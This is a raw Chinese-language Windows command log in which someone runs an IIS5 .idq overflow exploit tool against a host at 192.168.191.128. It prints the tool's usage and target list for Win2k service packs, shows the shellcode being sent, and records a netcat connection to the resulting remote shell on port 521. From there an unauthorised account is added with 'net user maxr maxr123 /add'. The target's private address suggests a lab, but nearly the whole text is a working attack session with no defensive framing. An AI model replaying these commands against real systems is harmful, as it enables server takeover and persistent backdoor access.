(C) 版权所有 1985-2003 Microsoft Corp.
驱动器 D 中的卷没有标签。
卷的序列号是 C461-74A9
2011-05-03 08:46 <DIR> ..
2001-07-24 13:34 16,384 IISIDQOverflowV2_Build0013.exe
2001-07-24 13:34 24,576 IISMiscOverflowV2_Build0013.exe
2001-07-24 13:37 1,281 ReadmeNow.txt
2001-09-23 09:56 506 ReadmNow.txt
4 个文件 42,747 字节
2 个目录 8,274,116,608 可用字节
'iisidq' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1>
或者: 操作系统类型 目的地址 web端口 2 溢出连接IP 溢出连接端口 <输入命令1>
其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe /c + dir"
如果为1,那么,将输入新的命令.
0 -- IIS5中文Win2k Sp0
1 -- IIS5中文Win2k Sp1
2 -- IIS5中文Win2k Sp2
3 -- IIS5 English Win2k Sp0
4 -- IIS5 English Win2k Sp1
5 -- --IIS5 English Win2k Sp2
6 -- IIS5 Japanese Win2k Sp0
7 -- IIS5 Japanese Win2k Sp1
8 -- --IIS5 Japanese Win2k Sp2
9 -- IIS5 Mexico Win2k
10 -- --IIS5 Mexico Win2k sp1
11 -- --IIS5 Mexico Win2k sp2
http://snake12.top263.net 2000/07
'iisidq' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
连接目的机器 192.168.191.128:80 OK.
发送shellcode 到 192.168.191.128:80 OK
现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [cmd.exe /c dir c:\] 结
果了...,good luck.!
D:\IISidq>cd..
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
驱动器 C 中的卷没有标签。
卷的序列号是 64FE-4AEE
2010-09-14 10:29 <DIR> Inetpub
2011-05-03 08:29 <DIR> Program Files
2011-05-03 08:33 <DIR> web
2011-05-03 08:42 <DIR> WINDOWS
0 个文件 0 字节
5 个目录 6,867,349,504 可用字节
D:\>dir
驱动器 D 中的卷没有标签。
卷的序列号是 C461-74A9
2011-04-11 15:54 1,549 8uftp.xml
2011-04-14 16:23 <DIR> backup
2011-04-15 08:46 <DIR> data
2011-04-21 09:20 <DIR> fakeTasks.{D6277990-4C6A-11CF-8D87-00AA0060F
5BF}
2011-05-03 08:46 <DIR> IISidq
2011-04-21 08:37 1,120 maxiangrui.rar
1996-07-26 08:39 45,568 nc.exe
2011-04-14 16:46 <DIR> Program Files
2011-04-14 16:45 34,235,768 QQ2010.exe
2011-04-21 09:20 <DIR> set.{21EC2020-3AEA-1069-A2DD-08002B30309D}
2011-04-20 08:29 <DIR> sql
2011-03-27 10:32 <DIR> vfp
2011-03-30 09:39 <DIR> wy
2011-04-14 16:24 <DIR> _user
2009-12-31 00:00 7,981,995 客户端模拟练习版.exe
2011-04-12 08:21 <DIR> 聊天冲浪
6 个文件 43,373,800 字节
11 个目录 8,274,067,456 可用字节
系统找不到指定的路径。
'iisidq' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
连接目的机器 192.168191.128:80 失败.
连接目的机器 192.168.191.128:80 OK.
发送shellcode 到 192.168.191.128:80 OK
现在,如果系统类型正确,并且漏洞存在,那么,应该 可以得到 [cmd.exe] 结果了...,good
luck.!
D:\IISidq>nc -v 192.168.191.128 521
'nc' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
punt!: unknown socket error
no port[s] to connect to
D:\>cd..
D:\>
D:\>
D:\>nc -v 192.168.191.128 521
ADMINIST-PFS9P6 [192.168.191.128] 521 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>net user maxr maxr123 /add
net user maxr maxr123 /add
命令成功完成。
cd..
cd..
dir
驱动器 C 中的卷没有标签。
卷的序列号是 64FE-4AEE
2010-09-14 10:29 <DIR> Inetpub
2011-05-03 08:29 <DIR> Program Files
2011-05-03 08:33 <DIR> web
2011-05-03 08:42 <DIR> WINDOWS
0 个文件 0 字节
5 个目录 6,867,341,312 可用字节
cd web